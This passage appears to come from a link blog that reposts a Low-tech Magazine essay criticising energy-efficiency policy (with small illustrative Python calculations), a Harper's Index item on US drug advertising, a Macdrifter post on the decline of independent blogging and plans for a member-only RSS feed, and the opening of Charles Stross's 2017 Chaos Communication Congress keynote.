Bedazzled by Energy Efficiency

Illustration by Diego Marmolejo.

To focus on energy efficiency is to make present ways of life non-negotiable. However, transforming present ways of life is key to mitigating climate change and decreasing our dependence on fossil fuels.

Energy efficiency policy

Energy efficiency is a cornerstone of policies to reduce carbon emissions and fossil fuel dependence in the industrialised world. For example, the European Union (EU) has set a target of achieving 20% energy savings through improvements in energy efficiency by 2020, and 30% by 2030. Measures to achieve these EU goals include mandatory energy efficiency certificates for buildings, minimum efficiency standards and labelling for a variety of products such as boilers, household appliances, lighting and televisions, and emissions performance standards for cars. [1]

The EU has the world’s most progressive energy efficiency policy, but similar measures are now applied in many other industrialised countries, including China. On a global scale, the International Energy Agency (IEA) asserts that “energy efficiency is the key to ensuring a safe, reliable, affordable and sustainable energy system for the future”. [2] In 2011, the organisation launched its 450 scenario, which aims to limit the concentration of CO2 in the atmosphere to 450 parts per million. Improved energy efficiency accounts for 71% of projected carbon reductions in the period to 2020, and 48% in the period to 2035. [2] [3]

What are the results?

Do improvements in energy efficiency actually lead to energy savings? At first sight, the advantages of efficiency seem to be impressive. For example, the energy efficiency of a range of domestic appliances covered by the EU directives has improved significantly over the last 15 years. Between 1998 and 2012, fridges and freezers became 75% more energy efficient, washing machines 63%, laundry dryers 72%, and dishwashers 50%. [4]

However, energy use in the EU-28 in 2015 was only slightly below the energy use in 2000 (1,627 Mtoe compared to 1,730 Mtoe, or million tonnes of oil equivalent). Furthermore, there are several other factors that may explain the (limited) decrease in energy use, such as the economic crisis of 2007. Indeed, after decades of continuous growth, energy use in the EU decreased slightly between 2007 and 2014, only to go up again in 2015 and 2016 when economic growth returned. [1]

On a global level, energy use keeps rising at an average rate of 2.4% per year. [3] This is double the rate of population growth, while close to half of the global population has limited or no access to modern energy sources. [5] In industrialised (OECD) countries, energy use per head of the population doubled between 1960 and 2007. [6]

Rebound effects?

Why is it that advances in energy efficiency do not result in a reduction of energy demand? Most critics focus on so-called “rebound effects”, which have been described since the nineteenth century. [7] According to the rebound argument, improvements in energy efficiency often encourage greater use of the services which energy helps to provide. [8] For example, the advance of solid state lighting (LED), which is six times more energy efficient than old-fashioned incandescent lighting, has not led to a decrease in energy demand for lighting. Instead, it resulted in six times more light. [9]

In some cases, rebound effects may be sufficiently large to lead to an overall increase in energy use. [8] For example, the improved efficiency of microchips has accelerated the use of computers, whose total energy use now exceeds the total energy use of earlier generations of computers which had less energy efficient microchips. Energy efficiency advances in one product category can also lead to increased energy use in other product categories, or lead to the creation of an entirely new product category.

For example, LED-screens are more energy efficient than LCD-screens, and could therefore reduce the energy use of televisions. However, they also led to the arrival of digital billboards, which are enormous power hogs in spite of their energy efficient components. [10] Finally, money saved through improvements in energy efficiency can also be spent on other energy-intensive goods and services, which is a possibility usually referred to as an indirect rebound effect.

Beyond the rebound argument

Rebound effects are ignored by the EU and the IEA, and this might partly explain why the results fall short of the projections. Among academics, the magnitude of the rebound effect is hotly debated. While some argue that “rebound effects frequently offset or even eliminate the energy savings from improved efficiency” [3], others maintain that rebound effects “have become a distraction” because they are relatively small: “behavioural responses shave 5-30% of intended energy savings, reaching no more than 60% when combined with macro-economic effects – energy efficiency does save energy”. [11]

Those who downplay rebound effects attribute the lack of results to the fact that we don’t try hard enough: “many opportunities for improving energy efficiency still go wasted”. [11] Others are driven by the goal of improving energy efficiency policy. One response is to suggest that the frame of reference be expanded and that analysts should consider the efficiency not of individual products but of entire systems or societies. In this view, energy efficiency is not framed holistically enough, nor given sufficient context. [12] [13]

However, a few critics go one step further. In their view, energy efficiency policy cannot be fixed. The problem with energy efficiency, they argue, is that it establishes and reproduces ways of life that are not sustainable in the long run. [12][14]

A parallel universe

Rebound effects are often presented as “unintended” consequences, but they are the logical outcome of the abstraction that is required to define and measure energy efficiency. According to Loren Lutzenhiser, a researcher at Portland State University in the US, energy efficiency policy is so abstracted from the everyday dynamics of energy use that it operates in a “parallel universe”. [14] In a more recent paper, What is wrong with energy efficiency?, UK researcher Elizabeth Shove unravels this “parallel universe”, concluding that efficiency policies are “counter-productive” and “part of the problem”. [12]

To start with, the parallel universe of energy efficiency interprets “energy savings” in a peculiar way. When the EU states that it will achieve 20% “energy savings” by 2020, “energy savings” are not defined as a reduction in actual energy consumption compared to present or historical figures. Indeed, such a definition would show that energy efficiency doesn’t reduce energy use at all. Instead, the “energy savings” are defined as reductions compared to the projected energy use in 2020. These reductions are measured by quantifying “avoided energy” – the energy resources not used because of advances in energy efficiency.

Even if the projected “energy savings” were to be fully realised, they would not result in an absolute reduction in energy demand. The EU argues that advances in energy efficiency will be “roughly equivalent to turning off 400 power stations”, but in reality no single power station will be turned off in 2020 because of advances in energy efficiency. Instead, the reasoning is that Europe would have needed to build an extra 400 power stations by 2020, were it not for the increases in energy efficiency.

In taking this approach, the EU treats energy efficiency as a fuel, “a source of energy in its own right”. [15] The IEA goes even further when it claims that “energy avoided by IEA member countries in 2010 (generated from investments over the preceding 1974 to 2010 period), was larger than actual demand met by any other supply side resource, including oil, gas, coal and electricity”, thus making energy efficiency “the largest or first fuel”. [16] [12]

Measuring something that doesn’t exist

Treating energy efficiency as a fuel and measuring its success in terms of “avoided energy” is pretty weird. For one thing, it is about not using a fuel that does not exist. [14] Furthermore, the higher the projected energy use in 2030, the larger the “avoided energy” would be. On the other hand, if the projected energy use in 2030 were to be lower than present-day energy use (we reduce energy demand), the “avoided energy” becomes negative.
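
The perversity of the metric is easy to demonstrate with a few lines of arithmetic. Here is a minimal sketch, using purely hypothetical numbers rather than actual EU figures:

```python
def avoided_energy(projected_use, actual_use):
    """'Avoided energy' as used in efficiency policy: the gap between a
    business-as-usual projection and the energy actually consumed."""
    return projected_use - actual_use

# The higher the baseline projection, the more energy is "avoided",
# even though actual consumption is identical in both cases.
print(avoided_energy(projected_use=1800, actual_use=1700))  # 100 "saved"
print(avoided_energy(projected_use=2000, actual_use=1700))  # 200 "saved"

# And if the projection ever dropped below actual use (a real reduction
# in demand), the "avoided energy" metric would turn negative.
print(avoided_energy(projected_use=1500, actual_use=1600))  # -100
```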

An energy policy that seeks to reduce greenhouse gas emissions and fossil fuel dependency must measure its success in terms of lower fossil fuel consumption. [17] However, by measuring “avoided energy”, energy efficiency policy does exactly the opposite. Because projected energy use is higher than present energy use, energy efficiency policy takes for granted that total energy consumption will keep rising.

That other pillar of climate change policy – the decarbonisation of the energy supply by encouraging the use of renewable energy power plants – suffers from similar defects. Because the increase in total energy demand outpaces the growth in renewable energy, solar and wind power plants are in fact not decarbonising the energy supply. They are not replacing fossil fuel power plants, but are helping to accommodate the ever growing demand for energy. Only by introducing the concept of “avoided emissions” can renewables be presented as having something of the desired effect. [18]

What is it that is efficient?

In What is wrong with energy efficiency?, Elizabeth Shove demonstrates that the concept of energy efficiency is just as abstract as the concept of “avoided energy”. Efficiency is about delivering more services (heat, light, transportation,…) for the same energy input, or the same services for less energy input. Consequently, a first step in identifying improvements depends on specifying “service” (what is it that is efficient?) and on quantifying the amount of energy involved (how is “less energy” known?). Setting a reference against which “energy savings” are measured also involves specifying temporal boundaries (where does efficiency start and end?). [12]

Shove’s main argument is that setting temporal boundaries (where does efficiency start and end?) automatically specifies the “service” (what is it that is efficient?), and the other way around. That’s because energy efficiency can only be defined and measured if it is based on equivalence of service. Shove focuses on home heating, but her point is valid for all other technologies. For example, in 1985, the average passenger plane used 8 litres of fuel to transport one passenger over a distance of 100 km, a figure that has come down to 3.7 litres today.

Consequently, we are told that airplanes have become twice as efficient. However, if we compare fuel use with 1950 instead of 1985, airplanes do not use less energy at all. In the 1960s, propeller aircraft were replaced by jet aircraft, which were twice as fast but initially consumed twice as much fuel. It took fifty years for the jet airplane to become as “energy efficient” as the last propeller planes of the 1950s. [19]
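
The arithmetic is trivial, but it shows how the choice of baseline decides the verdict. A minimal sketch, where the 1958 value is an assumption derived from the claim that the last propeller planes matched today's jets:

```python
# Fuel use per passenger per 100 km, based on the figures in the text.
fuel_l_per_100pkm = {
    "propeller, 1958": 3.7,  # assumed equal to today's jets (see text)
    "jet, 1985": 8.0,        # figure quoted in the text
    "jet, today": 3.7,       # figure quoted in the text
}

def efficiency_gain(baseline, comparison):
    """How many times 'more efficient' the comparison looks,
    relative to the chosen baseline."""
    return fuel_l_per_100pkm[baseline] / fuel_l_per_100pkm[comparison]

print(efficiency_gain("jet, 1985", "jet, today"))        # ~2.2: "twice as efficient"
print(efficiency_gain("propeller, 1958", "jet, today"))  # 1.0: no gain at all
```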

What then is a meaningful timespan over which to compare efficiencies? Should propeller planes be taken into account, or should they be ignored? The answer depends on the definition of equivalent service. If the service is defined as “flying”, then propeller planes should be included. But, if the energy service is defined as “flying at a speed of roughly 1,000 km/h”, we can discard propellers and focus on jet engines. However, the latter definition assumes a more energy-intensive service.

If we go back even further in time, for example to the early twentieth century, people didn’t fly at all and there’s no sense in comparing fuel use per passenger per kilometre. Similar observations can be made for many other technologies or services that have become “more energy efficient”. If they are viewed in a larger historical context, the concept of energy efficiency completely disintegrates because the services are not at all equivalent.

Often, it’s not necessary to go back very far to prove this. For example, when the energy efficiency of smartphones is calculated, the earlier generation of much less energy demanding “dumbphones” is not taken into account, although they were common less than a decade ago.

How efficient is a clothesline?

Because of the need to compare “like with like” and establish equivalence of service, energy efficiency policy ignores many low-energy alternatives that often have a long history but are still relevant in the context of climate change.

For example, the EU has calculated that energy labels for tumble driers will be able to “save up to 3.3 TWh of electricity by 2020, equivalent to the annual energy consumption of Malta”. [20] But how much energy use would be avoided if, by 2020, every European used a clothesline instead of a tumble drier? Don’t ask the EU, because it has not calculated the avoided energy use of clotheslines.

Clothesline. Illustration by Diego Marmolejo.

Nor do the EU or the IEA measure the energy efficiency and avoided energy of bicycles, hand-powered drills, or thermal underwear. Nevertheless, if clotheslines were taken seriously as an alternative, the projected 3.3 TWh of energy “saved” by more energy efficient tumble driers could no longer be considered “avoided energy”, let alone a fuel. In a similar way, bicycles and clothing undermine the very idea of calculating the “avoided energy” of more energy efficient cars and central heating boilers.

Unsustainable concepts of service

The problem with energy efficiency policies, then, is that they are very effective in reproducing and stabilising essentially unsustainable concepts of service. [12] Measuring the energy efficiency of cars and tumble driers, but not of bicycles and clotheslines, makes fast but energy-intensive ways of travel or clothes drying non-negotiable, and marginalises much more sustainable alternatives. According to Shove:

“Programmes of energy efficiency are politically uncontroversial precisely because they take current interpretations of ‘service’ for granted… The unreflexive pursuit of efficiency is problematic not because it doesn’t work or because the benefits are absorbed elsewhere, as the rebound effect suggests, but because it does work – via the necessary concept of equivalence of services – to sustain, perhaps escalate, but never undermine… increasingly energy intensive ways of life.” [12]

Indeed, the concept of energy efficiency easily accommodates further growth of energy services. All future novelties can be subjected to an efficiency approach. For example, if patio heaters and monsoon showers become “normal”, they could be incorporated in existing energy efficiency policy – and when that happens, the problem of their energy use is considered to be under control. At the same time, defining, measuring and comparing the efficiency of patio heaters and monsoon showers helps make them more “normal”. As a bonus, adding new products to the mix will only increase the energy use that is “avoided” through energy efficiency.

In short, neither the EU nor the IEA capture the “avoided energy” generated by doing things differently, or by not doing them at all – while these arguably have the largest potential to reduce energy demand. [12] Since the start of the Industrial Revolution, there has been a massive expansion in the uses of energy and in the delegation of tasks from human to mechanical forms of power. But although these trends are driving the continuing increase in energy demand, they cannot be measured through the concept of energy efficiency.

As Shove demonstrates, this problem cannot be solved, because energy efficiency can only be measured on the basis of equivalent service. Instead, she argues that the challenge is “to debate and extend meanings of service and explicitly engage with the ways in which these evolve”. [12]

Towards an energy inefficiency policy?

There are several ways to escape from the parallel universe of energy efficiency. First, while energy efficiency hinders significant long-term reductions in energy demand through the need for equivalence of service, the opposite also holds true – making everything less energy efficient would reverse the growth in energy services and reduce energy demand.

For example, if we were to install 1960s internal combustion engines into modern SUVs, fuel use per kilometre driven would be much higher than it is today. Few people would be able or willing to pay to drive such cars, leaving them no choice but to switch to a much lighter, smaller and less powerful vehicle, or to drive less.

Likewise, if an “energy inefficiency policy” were to mandate the use of inefficient central heating boilers, heating large homes to present-day comfort standards would be unaffordable for most people. They would be forced to find alternative solutions to achieve thermal comfort, for instance heating only one room, dressing more warmly, using personal heating devices, or moving to a smaller home.

Recent research into the heating of buildings confirms that inefficiency can save energy. A German study examined the calculated energy performance ratings of 3,400 homes and compared these with the actual measured consumption. [21] In line with the rebound argument, the researchers found that residents of the most energy efficient homes (75 kWh/m2/yr) use on average 30% more energy than the calculated rating. However, for less energy efficient homes, the opposite – “pre-bound” – effect was observed: people use less energy than the models had calculated, and the more inefficient the dwelling is, the larger this gap becomes. In the most energy inefficient dwellings (500 kWh/m2/yr), energy use was 60% below the predicted level.
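
A back-of-the-envelope calculation, using only the two data points quoted above, shows how strongly the rebound and prebound effects compress the real-world gap between rated and actual consumption:

```python
def actual_use(rated_kwh_m2_yr, deviation):
    """Measured consumption, given the calculated rating and the observed
    deviation from it: positive = rebound, negative = prebound."""
    return rated_kwh_m2_yr * (1 + deviation)

efficient = actual_use(75, +0.30)     # 97.5 kWh/m2/yr, 30% above its rating
inefficient = actual_use(500, -0.60)  # 200.0 kWh/m2/yr, 60% below its rating

# The ratings differ by a factor of 6.7; measured use differs by barely 2.
print(efficient, inefficient, inefficient / efficient)
```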

From efficiency to sufficiency?

However, while abandoning – or reversing – energy efficiency policy would arguably bring more energy savings than continuing it, there is another option that’s more attractive and could bring even larger energy savings. For an effective policy approach, efficiency can be complemented by or perhaps woven into a “sufficiency” strategy. Energy efficiency aims to increase the ratio of service output to energy input while holding the output at least constant. Energy sufficiency, by contrast, is a strategy that aims to reduce the growth in energy services. [4] In essence, this is a return to the “conservation” policies of the 1970s. [14]

Sufficiency can involve a reduction of services (less light, less travelling, less speed, lower indoor temperatures, smaller houses), or a substitution of services (a bicycle instead of a car, a clothesline instead of a tumble drier, thermal underclothing instead of central heating). Unlike energy efficiency, the policy objectives of sufficiency cannot be expressed in relative variables (like kWh/m2/year). Instead, the focus is on absolute variables, such as reductions in carbon emissions, fossil fuel use, or oil imports. [17] Unlike energy efficiency, sufficiency cannot be defined and measured by examining a single product type, because sufficiency can involve various forms of substitution. [22] Instead, a sufficiency policy is defined and measured by looking at what people actually do.

A sufficiency policy could be developed without a parallel efficiency policy, but combining them could bring larger energy savings. The key step here is to think of energy efficiency as a means rather than an end in itself, argues Shove. [12] For example, imagine how much energy could be saved if we used an energy-efficient boiler to heat just one room to 16 degrees, installed an energy-efficient engine in a much lighter vehicle, or combined an energy-saving shower design with fewer and shorter showers. Nevertheless, while energy efficiency is considered to be a win-win strategy, to develop the concept of sufficiency as a significant force in policy is to make normative judgments: so much consumption is enough, so much is too much. [23] This is sure to be controversial, and it risks being authoritarian, at least as long as there is a cheap supply of fossil fuels.

Kris De Decker

Illustrations by Diego Marmolejo.


References

[1] "Energy Efficiency", European Commission. https://ec.europa.eu/energy/en/topics/energy-efficiency

[2] "Energy Efficiency", International Energy Association (IEA). https://www.iea.org/topics/energyefficiency/

[3] Sorrell, Steve. "Reducing energy demand: A review of issues, challenges and approaches." Renewable and Sustainable Energy Reviews 47 (2015): 74-82. http://www.sciencedirect.com/science/article/pii/S1364032115001471

[4] Brischke, Lars-Arvid, et al. Energy sufficiency in private households enabled by adequate appliances. Wuppertal Institut für Klima, Umwelt, Energie, 2015. https://epub.wupperinst.org/frontdoor/deliver/index/docId/5932/file/5932_Brischke.pdf

[5] "Poor people's Energy Outlook 2016", Practical Action, 2016. https://policy.practicalaction.org/policy-themes/energy/poor-peoples-energy-outlook/poor-people-s-energy-outlook-2016

[6] "Energy use (kg of oil equivalent per capita)", World Bank, 2014. https://data.worldbank.org/indicator/EG.USE.PCAP.KG.OE

[7] Alcott, Blake. "Jevons' paradox." Ecological economics 54.1 (2005): 9-21. https://pdfs.semanticscholar.org/f247/b8fae38e0c46bb9d1020b0be0d589db28446.pdf

[8] Sorrell, Steve. "The Rebound Effect: an assessment of the evidence for economy-wide energy savings from improved energy efficiency." (2007). http://ukerc.rl.ac.uk/UCAT/PUBLICATIONS/The_Rebound_Effect_An_Assessment_of_the_Evidence_for_Economy-wide_Energy_Savings_from_Improved_Energy_Efficiency.pdf

[9] Kyba, Christopher CM, et al. "Artificially lit surface of Earth at night increasing in radiance and extent." Science advances 3.11 (2017): e1701528. http://advances.sciencemag.org/content/3/11/e1701528.full?intcmp=trendmd-adv; Tsao, Jeffrey Y., et al. "Solid-state lighting: an energy-economics perspective." Journal of Physics D: Applied Physics 43.35 (2010): 354001. http://siteresources.worldbank.org/INTEAER/Resources/Sao.Simmons.pdf

[10] Young, Gregory. "Illuminating the Issues." (2013). http://www.scenic.org/storage/documents/Digital_Signage_Final_Dec_14_2010.pdf

[11] Gillingham, Kenneth, et al. "Energy policy: The rebound effect is overplayed." Nature 493.7433 (2013): 475-476. http://environment.yale.edu/kotchen/pubs/rebound.pdf

[12] Shove, Elizabeth. "What is wrong with energy efficiency?." Building Research & Information (2017): 1-11. http://www.tandfonline.com/doi/full/10.1080/09613218.2017.1361746

[13] Calwell, Chris. Is efficient sufficient? Report for the European Council for an Energy Efficient Economy. http://www.eceee.org/static/media/uploads/site-2/policy-areas/sufficiency/eceee_Progressive_Efficiency.pdf

[14] Lutzenhiser, Loren. "Through the energy efficiency looking glass." Energy Research & Social Science 1 (2014): 141-151. http://www.sciencedirect.com/science/article/pii/S2214629614000255

[15] Good Practice in Energy Efficiency: for a sustainable, safer and more competitive Europe. European Commission, 2017.

[16] Capturing the Multiple Benefits of Energy Efficiency. IEA, 2014. https://www.iea.org/Textbase/npsum/MultipleBenefits2014SUM.pdf

[17] Harris, Jeffrey, et al. "Towards a sustainable energy balance: progressive efficiency and the return of energy conservation." Energy efficiency 1.3 (2008): 175-188. https://pubarchive.lbl.gov/islandora/object/ir%3A150324/datastream/PDF/view

[18] How (not) to resolve the energy crisis, Low-tech Magazine, Kris De Decker, 2009. http://www.lowtechmagazine.com/2009/11/renewable-energy-is-not-enough.html

[19] Peeters, Paul, J. Middel, and A. Hoolhorst. "Fuel efficiency of commercial aircraft: an overview of historical and future trends." (2005). https://www.transportenvironment.org/publications/fuel-efficiency-commercial-aircraft-overview-historical-and-future-trends

[20] Household Tumble Driers, European Commission. https://ec.europa.eu/energy/en/topics/energy-efficiency/energy-efficient-products/household-tumble-driers

[21] Sunikka-Blank, Minna, and Ray Galvin. "Introducing the prebound effect: the gap between performance and actual energy consumption." Building Research & Information 40.3 (2012): 260-273. http://www.tandfonline.com/doi/full/10.1080/09613218.2012.690952

[22] Thomas, Stefan, et al. Energy sufficiency policy: an evolution of energy efficiency policy or radically new approaches?. Wuppertal Institut für Klima, Umwelt, Energie, 2015. https://epub.wupperinst.org/frontdoor/deliver/index/docId/5922/file/5922_Thomas.pdf

[23] Darby, Sarah. "Enough is as good as a feast–sufficiency as policy." Proceedings, European Council for an Energy-Efficient Economy. La Colle sur Loup, 2007. https://pdfs.semanticscholar.org/8e68/c68ace130104ef6fc0f736339ff34b253509.pdf


Pharmaceutical Ads in the U.S.

From Harper’s Index for January:

Amount the US pharmaceutical industry spent in 2016 on ads for prescription drugs: $6,400,000,000

Number of countries in which direct-to-consumer pharmaceutical ads are legal: 2

Link: harpers.org/archive/2018/01/harpers-index-401/

Comment from onepointzero (Brussels, Belgium): It always surprises me when I go to the USA and see TV ads for pharmaceuticals. Their packaging is also wilder – made to sell – vs the neutral style they have here in Europe.

You Get What You Get

Stay with me. This isn't my typical link-post. It's also long so if you don't care about the web or independent writing, here's a nice article about genealogy and statistics.

Two recent articles by Jason Kottke mesh nicely with something that has been weighing on me for the past couple of years. Let's set the context though. I think kottke.org is a wonderful site and I read every article he publishes on his RSS feed. Jason is an originator of the type of Internet content I love. But kottke.org is struggling along with every other site that respects people as more than a monetization model.

Jason on the new membership model:

From a business perspective, it’s an understatement to say that it’s been a bit unnerving seeing 10 years of steadily growing revenue being replaced by something else entirely. I’ve been trying (and failing) to come up with a metaphor to explain it...the site is exactly the same, the revenue is in the same ballpark as before, but the financing is completely different.

I've considered the membership model for Macdrifter but I'm not sure I'd like the obligations that come with most memberships. Bonuses like special newsletters and access restrictions always seem like the opposite of web-publishing. It's nice to see that Jason is making a simple membership sustainable.

Even with new business models, I think that the idea of people regularly reading the same websites as part of their daily routine is a hobby left to old people like me. To be relevant we all need to accept that the open web is not going to exist much longer and certainly isn't important in a way that the average person understands. Adapt or languish. [1]

Jason, again:

But I’ve also been thinking a lot about how the information published here is delivered. I love the web and websites and believe the blog format is the best for the type of thing I want to communicate. But fewer and fewer people actually go to websites. I largely don’t. You can follow kottke.org on Facebook, Twitter, Tumblr, Pinterest, and via RSS, but fewer people are using newsreaders and Facebook et al are trying their best to decrease visibility of sites like mine unless I pay up or constantly publish.

It's right to complain and lament. Those were rich and vibrant times on the web. But no one wants to be arranging blog posts on the Titanic. Everything changes.

I loved when blogs were conversations between different people. Person "A" writes something. Person "B" writes a reply on their own site and links to person "A." The web was made of threads and it was rich and varied and wonderful. But it wasn't profitable and it was hard work to create and follow. It took guts and time. It was before Facebook made the internet a comment thread.

I think Kamer (and to a lesser degree Kottke) is wrong on this point:

We blame Walmart for decimating small businesses, but ultimately, small town shoppers chose convenience and lower prices over the more local and diverse offerings from their neighbors. And for the past several years, readers have been doing the same thing in favoring Facebook. What Kamer is arguing is that readers who value good journalism, good writing, and diverse viewpoints need to push back against the likes of the increasingly powerful and monolithic Facebook...and visiting individual websites is one way to do that.

It's arguing against capitalism, tribalism, and all other types of human nature. We can complain about Facebook and Twitter (as I regularly do) but we can't negotiate a treaty with their users. There will be consequences of Facebook and Twitter but if humans are experts at anything, it's misidentifying consequences. We still don't even understand what killed newspapers.

Advertising on Macdrifter stopped being fun for me several years ago. I never did anything popular enough to be on The Deck so I did most of my ads by hand. At one time I produced lengthy product walk-throughs as an alternative to just running an ad. [2] It paid me a bit of money but it also helped out products that I like. There's no future in ads if you care about the people at the other end of them. Chronic internet users are calloused and immune to most ads. Everything seems like a scam so it's hard to trust anyone. Ads have become malware that publishers foist on readers for a few pennies. The arms race of ads and ad blockers is just starting and it will be expensive to keep up.

Back to our main character, Jason Kottke. The plot thickens as we see our hero take a foreshadowed turn:

The newsletter is very much a work in progress and a departure from the way I usually do things around here. For one thing, it’s a collaboration…almost everything else I’ve done on the site was just me. We’ve previewed it over the last two weeks just for members, but it’s still more “unfinished” than I’m comfortable with. The design hasn’t been nailed down, the logo will likely change, and Tim & I are still trying to figure out the voice and length. But launching it unfinished feels right…we aren’t wasting time on optimization and there’s more opportunity to experiment and move toward what works as time goes on. We hope you’ll join us by subscribing and letting us know your thoughts and feedback as we get this thing moving.

As much as I am a fan of email as a self-documenting form of asynchronous communication, I'll be honest: I don't understand the popularity of newsletters. I do not enjoy reading in email. I do not like leisure mixed into work. I do not like the options I have for mobile access. I do not like more things coming into my inbox that need to be managed. It's just not for me.

It's interesting to see how the final few fish struggle for their existence in the pond. Some are choosing to evolve and branch out. To do more work, not less. Others, like me, are just biding time until death takes us off of the DNS for good.

So much of what I enjoy reading is gone. Most of the friends I made over the years have given up the ghost on their blogs. Those that continue to scratch out the rare post here and there do so with less humor and less excitement. The generally benign group of sites left to write about the random weirdness of the world makes me feel less curious. When I search for answers on the internet, most of the truly interesting stuff is hits from blogs that stopped publishing in 2014.

So there you go. I write less on Macdrifter because it's depressing. To all of those people that take the time to write in and ask questions or suggest topics, I really like you. You are all oddballs. You're all my people and you're why I keep going with this dumb project.

I automatically collect server stats but in the most rudimentary way possible. [3] I've been collecting them since 2011 and the historic perspective is heartening. The numbers haven't declined even though my posting has. I don't put much weight on these stats. I haven't looked at them in over a year.

[Image: server statistics chart]

I read these as a trend, not a precise number. I've basically found my niche. I've posted over 3000 articles since 2006. That breadcrumb trail has lured a consistent number of readers who seem to like what I make.

Now let's have a series of self-serving questions to answer. Readers love that.

Why do it then?

That's a great question. Thanks for asking it. I asked myself this question a long time ago, and I asked a bunch of other bloggers too. Some answered and some didn't. But it colors how I see everything on the internet now. Why is this person writing this article? Why are they making a podcast? What do they get out of it?

I post to Macdrifter because it makes people notice me and that attention has provided both casual and real friendships. It gives me a ticket to some awkward party that everyone pretends they don't care about but still loves.

I also write because it gives me an outlet for thinking more deeply. In contrast to podcasting, writing is deliberate and methodical and gives me time to consider ideas more completely. Podcasting is fun but because it's fleeting and not yet searchable there are very few long-term consequences for lazy thinking. I love podcasts, A LOT, but the medium makes most smart people dumber whereas blogging seems to hone them.

The last reason for blogging is also self-serving. It's one of the best ways I can think of to help developers that make things I like. The AppStore is terrible. Reviews are broken. Editor picks seem to be thoughtless. I buy apps used by people I respect. I usually don't care what "coolkid369" thinks about something on the AppStore. But if Merlin Mann uses an app, you can be damn well sure I'll buy it. I'll tell everyone I know, then that app has a better chance of making it long term. The developer wins and I win. Hakuna Matata.

So what now?

Another great question. You're on a roll. Macdrifter loses money. I pay for the domain, hosting, and every app I review. [4] That kind of stinks. The consequence is that I don't review as many apps or products because it's a waste of my money. But, I also don't want to run ads. The only real option is reader support. Without direct reader support I just don't have the motivation to do much here. That's the truth. Now you know.

What's going to happen?

Have you not learned anything? I'm very unmotivated but I'm also meticulous in my research. Nothing is going to change immediately. I will continue to post to Macdrifter and Hobo Signs while I figure out the sponsorship model and the technical implementation. If membership works and you don't subscribe then you'll just notice an increase in publishing at Macdrifter and maybe a small pang of guilt in your darkest of hearts.

Here's what I'm thinking:

I'll probably use Patreon for membership processing and member communication.

I like the format Dave Winer is using at Scripting.com. It's informal and stream-like. I don't like the actual news-stream format he has but I like his chatty posting style.

I also like to solve problems and share solutions so I'll need some method of communicating that's better than email. I also don't want to moderate a community.

I like RSS so I need a membership feed.

I don't like DRM but, like door locks, a minimum amount of effort helps keep honest people honest. This means that a feed will need to be member-only but still work with all RSS readers (one possible approach is sketched after this list).

The membership should be monthly and relatively inexpensive because I know I have subscription exhaustion myself.
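
On that member-only feed: here is one minimal sketch of how it could work without real DRM, using a per-member token embedded in the feed URL, which any standard RSS reader can fetch. Everything in it (the framework choice, the token table, the route) is a hypothetical illustration, not a description of how Macdrifter will actually do it:

```python
# Hypothetical sketch: a secret per-member token in the feed URL keeps
# honest people honest while staying compatible with every RSS reader.
from flask import Flask, Response, abort

app = Flask(__name__)

# In a real setup these would live in a database, one token per member,
# revocable when a membership lapses.
MEMBER_TOKENS = {"a1b2c3d4": "example-member"}

MEMBER_FEED = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel>
  <title>Members-only feed</title>
  <item><title>A members-only post</title></item>
</channel></rss>"""

@app.route("/feed/members/<token>.xml")
def members_feed(token):
    if token not in MEMBER_TOKENS:
        abort(403)  # unknown or revoked token
    return Response(MEMBER_FEED, mimetype="application/rss+xml")
```

A member would paste their personal URL (e.g. example.com/feed/members/a1b2c3d4.xml) into any reader; nothing else about the feed changes.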

You Get What You Get and Don't Get Upset

The web has changed. It's not what I had hoped for, but here it is. It's the web we have.

References

You’re Descended From Royalty and So Is Everybody Else

Home of Fine Hypertext Products

kottke.org Memberships, an Update One Year Later

Support kottke.org With a Membership

In Tech and Media, You Can’t Remain Neutral on a Moving Train

Stop Using Facebook and Start Using Your Browser

Saving the Free Press From Private Equity

iThoughts Is the Premier Mind Mapping Software for Mac and iOS [Sponsor]

Casper’s war on mattress bloggers

Ad Targeters Are Pulling Data From Your Browser’s Password Manager

Noticing, a New Weekly Newsletter From kottke.org

Free Real-Time Logfile Analyzer to Get Advanced Statistics (GNU GPL).

Asking Why

Hobo Signs

It's Even Worse Than It Appears.

You Get What You Get


  1. Yes, I'm very cynical about the future of the internet. I was cynical when Facebook wanted to get into publishing. I was cynical when Twitter said it would block hate groups. I was cynical when Republicans took over the FCC. I've seen very few positive changes on the internet in the past five years that would make me optimistic.

  2. These were actually fun to make but they were a huge amount of work. I'd wager that my hourly rate for these ads was about $10 which is not a good business to be in if you like money and things. 

  3. I got rid of Google stats long ago because it was slowing down the page loading and I also try to avoid Google whenever it's within my control. 

  4. This is still my biggest pet peeve with sites that review apps. Not paying for an app out of your own bank account means value is never really a part of the assessment. We can pretend it is for the sake of a good narrative but if you didn't pay the $50 that app costs then you really can't feel the sacrifice a reader feels when they choose between a bunch of similarly priced apps. Say that up front. Say that the app didn't cost you anything and that your review doesn't take the cost into consideration.

Comment from onepointzero (Brussels, Belgium): The rise of the content silos is depressing.

Dude, you broke the future!

This is the text of my keynote speech at the 34th Chaos Communication Congress in Leipzig, December 2017.

(You can also watch it on YouTube, but it runs to about 45 minutes.)




Abstract: We're living in yesterday's future, and it's nothing like the speculations of our authors and film/TV producers. As a working science fiction novelist, I take a professional interest in how we get predictions about the future wrong, and why, so that I can avoid repeating the same mistakes. Science fiction is written by people embedded within a society with expectations and political assumptions that bias us towards looking at the shiny surface of new technologies rather than asking how human beings will use them, and to taking narratives of progress at face value rather than asking what hidden agenda they serve.

In this talk, author Charles Stross will give a rambling, discursive, and angry tour of what went wrong with the 21st century, why we didn't see it coming, where we can expect it to go next, and a few suggestions for what to do about it if we don't like it.




Good morning. I'm Charlie Stross, and it's my job to tell lies for money. Or rather, I write science fiction, much of it about our near future, which has in recent years become ridiculously hard to predict.

Our species, Homo sapiens sapiens, is roughly three hundred thousand years old. (Recent discoveries pushed back the date of our earliest remains that far; we may be even older.) For all but the last three centuries of that span, predicting the future was easy: natural disasters aside, everyday life in fifty years' time would resemble everyday life fifty years ago.

Let that sink in for a moment: for 99.9% of human existence, the future was static. Then something happened, and the future began to change, increasingly rapidly, until we get to the present day when things are moving so fast that it's barely possible to anticipate trends from month to month.

As an eminent computer scientist once remarked, computer science is no more about computers than astronomy is about building telescopes. The same can be said of my field of work, written science fiction. Scifi is seldom about science—and even more rarely about predicting the future. But sometimes we dabble in futurism, and lately it's gotten very difficult.

How to predict the near future

